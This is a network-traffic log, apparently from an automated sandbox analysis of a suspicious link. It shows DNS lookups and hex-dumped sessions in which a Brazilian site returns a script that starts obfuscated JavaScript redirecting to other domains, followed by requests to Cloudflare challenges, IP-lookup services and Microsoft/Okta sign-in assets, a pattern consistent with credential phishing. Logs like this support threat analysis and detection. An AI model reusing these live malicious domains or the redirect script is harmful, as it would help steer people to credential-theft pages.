                                                              Jul 3, 2024 09:40:33.431674004 CEST1.1.1.1192.168.2.60x2e07No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.432923079 CEST1.1.1.1192.168.2.60xf4feNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.432923079 CEST1.1.1.1192.168.2.60xf4feNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.432943106 CEST1.1.1.1192.168.2.60xfde4No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.440167904 CEST1.1.1.1192.168.2.60x6960No error (0)nzd92.6gniu68.ru65IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.482614994 CEST1.1.1.1192.168.2.60xc185No error (0)nzd92.6gniu68.ru188.114.96.3A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.482614994 CEST1.1.1.1192.168.2.60xc185No error (0)nzd92.6gniu68.ru188.114.97.3A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:35.550637960 CEST1.1.1.1192.168.2.60xe072No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:35.550637960 CEST1.1.1.1192.168.2.60xe072No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:35.551096916 CEST1.1.1.1192.168.2.60x693cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:37.115586996 CEST1.1.1.1192.168.2.60x88eaNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:37.115586996 CEST1.1.1.1192.168.2.60x88eaNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:37.116875887 CEST1.1.1.1192.168.2.60xbdeaNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:41.133304119 CEST1.1.1.1192.168.2.60xd5c5No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                              Jul 3, 2024 09:40:41.133304119 CEST1.1.1.1192.168.2.60xd5c5No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:44.097743034 CEST1.1.1.1192.168.2.60xf179No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:44.097743034 CEST1.1.1.1192.168.2.60xf179No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:57.781459093 CEST1.1.1.1192.168.2.60xbe28Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                              Jul 3, 2024 09:41:00.534182072 CEST1.1.1.1192.168.2.60x9212No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:00.534182072 CEST1.1.1.1192.168.2.60x9212No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:01.267283916 CEST1.1.1.1192.168.2.60x497cNo error (0)vkwek.ckyucle.com188.114.96.3A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:01.267283916 CEST1.1.1.1192.168.2.60x497cNo error (0)vkwek.ckyucle.com188.114.97.3A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.881949902 CEST1.1.1.1192.168.2.60x4ef8No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.881949902 CEST1.1.1.1192.168.2.60x4ef8No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.881949902 CEST1.1.1.1192.168.2.60x4ef8No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.881949902 CEST1.1.1.1192.168.2.60x4ef8No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.881949902 CEST1.1.1.1192.168.2.60x4ef8No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.881962061 CEST1.1.1.1192.168.2.60x5140No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.881970882 CEST1.1.1.1192.168.2.60x6200No error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.886940956 CEST1.1.1.1192.168.2.60xc939No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.886940956 CEST1.1.1.1192.168.2.60xc939No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.886940956 CEST1.1.1.1192.168.2.60xc939No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.886940956 CEST1.1.1.1192.168.2.60xc939No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.899657011 CEST1.1.1.1192.168.2.60x6cfNo error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.899657011 CEST1.1.1.1192.168.2.60x6cfNo error (0)d19d360lklgih4.cloudfront.net13.33.187.68A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.899657011 CEST1.1.1.1192.168.2.60x6cfNo error (0)d19d360lklgih4.cloudfront.net13.33.187.14A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.899657011 CEST1.1.1.1192.168.2.60x6cfNo error (0)d19d360lklgih4.cloudfront.net13.33.187.120A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.899657011 CEST1.1.1.1192.168.2.60x6cfNo error (0)d19d360lklgih4.cloudfront.net13.33.187.96A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:05.821000099 CEST1.1.1.1192.168.2.60xa281No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:05.821000099 CEST1.1.1.1192.168.2.60xa281No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:05.821000099 CEST1.1.1.1192.168.2.60xa281No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:05.821000099 CEST1.1.1.1192.168.2.60xa281No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:08.685153961 CEST1.1.1.1192.168.2.60xf8cfNo error (0)httpbin.org3.227.135.8A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:08.685153961 CEST1.1.1.1192.168.2.60xf8cfNo error (0)httpbin.org18.214.17.35A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:09.497319937 CEST1.1.1.1192.168.2.60xc7a2No error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:09.497319937 CEST1.1.1.1192.168.2.60xc7a2No error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:09.497319937 CEST1.1.1.1192.168.2.60xc7a2No error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:10.342035055 CEST1.1.1.1192.168.2.60x1151No error (0)s3irk.ativens.com104.21.90.167A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:10.342035055 CEST1.1.1.1192.168.2.60x1151No error (0)s3irk.ativens.com172.67.158.52A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:11.961900949 CEST1.1.1.1192.168.2.60xeeb7No error (0)aadcdn.msauthimages.netaadcdn.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                              Jul 3, 2024 09:41:11.961900949 CEST1.1.1.1192.168.2.60xeeb7No error (0)scdn3514c.wpc.9e730.upsiloncdn.netsni1gl.wpc.upsiloncdn.netCNAME (Canonical name)IN (0x0001)false
                                                              Jul 3, 2024 09:41:11.961900949 CEST1.1.1.1192.168.2.60xeeb7No error (0)sni1gl.wpc.upsiloncdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:32.857125044 CEST1.1.1.1192.168.2.60xdc7eNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:43.219492912 CEST1.1.1.1192.168.2.60x3180No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:43.219492912 CEST1.1.1.1192.168.2.60x3180No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                              • www.itanhangasaude.com.br
                                                              • https:
                                                                • vkwek.ckyucle.com
                                                                • nzd92.6gniu68.ru
                                                                • challenges.cloudflare.com
                                                                • cdnjs.cloudflare.com
                                                                • code.jquery.com
                                                                • www.google.com
                                                                • github.com
                                                                • cdn.socket.io
                                                                • ok4static.oktacdn.com
                                                                • objects.githubusercontent.com
                                                                • httpbin.org
                                                                • ipapi.co
                                                                • s3irk.ativens.com
                                                                • aadcdn.msauthimages.net
                                                              • a.nel.cloudflare.com
                                                              • fs.microsoft.com
                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              0192.168.2.64970940.115.3.253443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:16 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 63 75 61 63 5a 4d 68 49 6c 6b 65 47 78 63 50 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 31 61 34 66 39 63 33 63 33 32 33 37 65 39 0d 0a 0d 0a
                                                              Data Ascii: CNT 1 CON 305MS-CV: cuacZMhIlkeGxcPu.1Context: ec1a4f9c3c3237e9
                                                              2024-07-03 07:40:16 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                              2024-07-03 07:40:16 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 63 75 61 63 5a 4d 68 49 6c 6b 65 47 78 63 50 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 31 61 34 66 39 63 33 63 33 32 33 37 65 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33
                                                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: cuacZMhIlkeGxcPu.2Context: ec1a4f9c3c3237e9<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
                                                              2024-07-03 07:40:16 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 63 75 61 63 5a 4d 68 49 6c 6b 65 47 78 63 50 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 31 61 34 66 39 63 33 63 33 32 33 37 65 39 0d 0a 0d 0a
                                                              Data Ascii: BND 3 CON\QOS 56MS-CV: cuacZMhIlkeGxcPu.3Context: ec1a4f9c3c3237e9
                                                              2024-07-03 07:40:16 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                              Data Ascii: 202 1 CON 58
                                                              2024-07-03 07:40:16 UTC58INData Raw: 4d 53 2d 43 56 3a 20 33 67 35 5a 32 69 2f 51 4d 30 69 6a 65 78 30 68 57 63 76 2b 6e 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                              Data Ascii: MS-CV: 3g5Z2i/QM0ijex0hWcv+ng.0Payload parsing failed.


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1192.168.2.64971040.115.3.253443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:21 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 77 78 78 42 6e 75 57 4e 45 65 5a 57 62 54 35 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 65 63 66 64 32 35 66 39 62 36 37 66 38 36 64 0d 0a 0d 0a
                                                              Data Ascii: CNT 1 CON 305MS-CV: 7wxxBnuWNEeZWbT5.1Context: 4ecfd25f9b67f86d
                                                              2024-07-03 07:40:21 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                              2024-07-03 07:40:21 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 37 77 78 78 42 6e 75 57 4e 45 65 5a 57 62 54 35 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 65 63 66 64 32 35 66 39 62 36 37 66 38 36 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33
                                                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 7wxxBnuWNEeZWbT5.2Context: 4ecfd25f9b67f86d<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
                                                              2024-07-03 07:40:21 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 37 77 78 78 42 6e 75 57 4e 45 65 5a 57 62 54 35 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 65 63 66 64 32 35 66 39 62 36 37 66 38 36 64 0d 0a 0d 0a
                                                              Data Ascii: BND 3 CON\QOS 56MS-CV: 7wxxBnuWNEeZWbT5.3Context: 4ecfd25f9b67f86d
                                                              2024-07-03 07:40:21 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                              Data Ascii: 202 1 CON 58
                                                              2024-07-03 07:40:21 UTC58INData Raw: 4d 53 2d 43 56 3a 20 39 71 79 72 71 72 4c 68 32 55 79 39 38 2b 63 2b 31 46 2b 57 47 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                              Data Ascii: MS-CV: 9qyrqrLh2Uy98+c+1F+WGg.0Payload parsing failed.


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              2192.168.2.64971140.115.3.253443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:26 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 71 4c 64 58 34 35 57 4e 79 30 6d 7a 50 71 77 53 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 39 39 39 65 39 61 39 32 36 37 63 38 66 66 0d 0a 0d 0a
                                                              Data Ascii: CNT 1 CON 305MS-CV: qLdX45WNy0mzPqwS.1Context: de999e9a9267c8ff
                                                              2024-07-03 07:40:26 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                              2024-07-03 07:40:26 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 71 4c 64 58 34 35 57 4e 79 30 6d 7a 50 71 77 53 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 39 39 39 65 39 61 39 32 36 37 63 38 66 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 7a 55 45 6b 33 4e 66 59 68 39 44 37 4a 45 5a 56 62 6c 51 70 7a 62 55 68 49 35 31 6e 4c 71 31 6c 79 78 73 49 65 70 6c 50 58 6f 72 4f 79 52 49 56 48 6e 75 53 2b 51 69 6e 32 63 6a 51 38 47 78 6c 52 66 65 2f 66 72 53 38 6e 4e 35 33 45 6b 50 56 49 67 5a 54 76 4c 63 7a 43 74 4b 2f 74 4b 78 6b 4e 6c 45 66 39 33 48 61 4b 43 39 4b
                                                              Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: qLdX45WNy0mzPqwS.2Context: de999e9a9267c8ff<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXzUEk3NfYh9D7JEZVblQpzbUhI51nLq1lyxsIeplPXorOyRIVHnuS+Qin2cjQ8GxlRfe/frS8nN53EkPVIgZTvLczCtK/tKxkNlEf93HaKC9K
                                                              2024-07-03 07:40:26 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 71 4c 64 58 34 35 57 4e 79 30 6d 7a 50 71 77 53 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 39 39 39 65 39 61 39 32 36 37 63 38 66 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: qLdX45WNy0mzPqwS.3Context: de999e9a9267c8ff<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                              2024-07-03 07:40:26 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                              Data Ascii: 202 1 CON 58
                                                              2024-07-03 07:40:26 UTC58INData Raw: 4d 53 2d 43 56 3a 20 5a 56 76 31 35 4d 51 34 31 6b 53 31 74 45 59 48 52 61 45 49 30 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                              Data Ascii: MS-CV: ZVv15MQ41kS1tEYHRaEI0A.0Payload parsing failed.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.649720162.241.62.334434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:30 UTC922OUTGET /www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT HTTP/1.1
                                                              Host: www.itanhangasaude.com.br
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              sec-ch-ua-platform: "Windows"
                                                              Upgrade-Insecure-Requests: 1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: navigate
                                                              Sec-Fetch-User: ?1
                                                              Sec-Fetch-Dest: document
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:30 UTC212INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:30 GMT
                                                              Server: nginx/1.23.4
                                                              Content-Type: text/html; charset=UTF-8
                                                              Vary: Accept-Encoding
                                                              X-Server-Cache: true
                                                              X-Proxy-Cache: MISS
                                                              Transfer-Encoding: chunked
                                                              2024-07-03 07:40:30 UTC5273INData Raw: 31 34 38 63 0d 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 76 61 72 20 6c 61 6e 64 20 3d 20 22 68 74 74 70 73 3a 2f 2f 76 6b 77 65 6b 2e 63 6b 79 75 63 6c 65 2e 63 6f 6d 2f 32 44 55 78 2f 23 2d 22 3b 0a 20 20 20 20 76 61 72 20 5f 77 68 65 72 65 20 3d 20 32 3b 0a 20 20 20 20 76 61 72 20 5f 77 68 69 63 68 20 3d 20 22 5f 5f 5f 22 3b 0a 20 20 20 20 0a 20 20 20 20 76 61 72 20 5f 30 78 32 38 35 36 38 37 3d 5f 30 78 32 38 38 62 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 39 61 39 64 63 2c 5f 30 78 35 35 34 64 31 64 29 7b 76 61 72 20 5f 30 78 32 37 30 39 39 31 3d 5f 30 78 32 38 38 62 2c 5f 30 78 33 31 38 39 39 31 3d 5f 30 78 35 39 61 39 64 63 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 31 36 30 61 64 38 3d 70 61 72 73 65 49 6e 74
                                                              Data Ascii: 148c<script> var land = "https://vkwek.ckyucle.com/2DUx/#-"; var _where = 2; var _which = "___"; var _0x285687=_0x288b;(function(_0x59a9dc,_0x554d1d){var _0x270991=_0x288b,_0x318991=_0x59a9dc();while(!![]){try{var _0x160ad8=parseInt


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              4192.168.2.64972240.115.3.253443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:31 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 57 51 78 34 64 6b 45 59 44 45 53 4b 67 2b 41 73 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 65 32 61 37 65 38 36 38 38 61 38 61 61 65 0d 0a 0d 0a
                                                              Data Ascii: CNT 1 CON 305MS-CV: WQx4dkEYDESKg+As.1Context: a6e2a7e8688a8aae
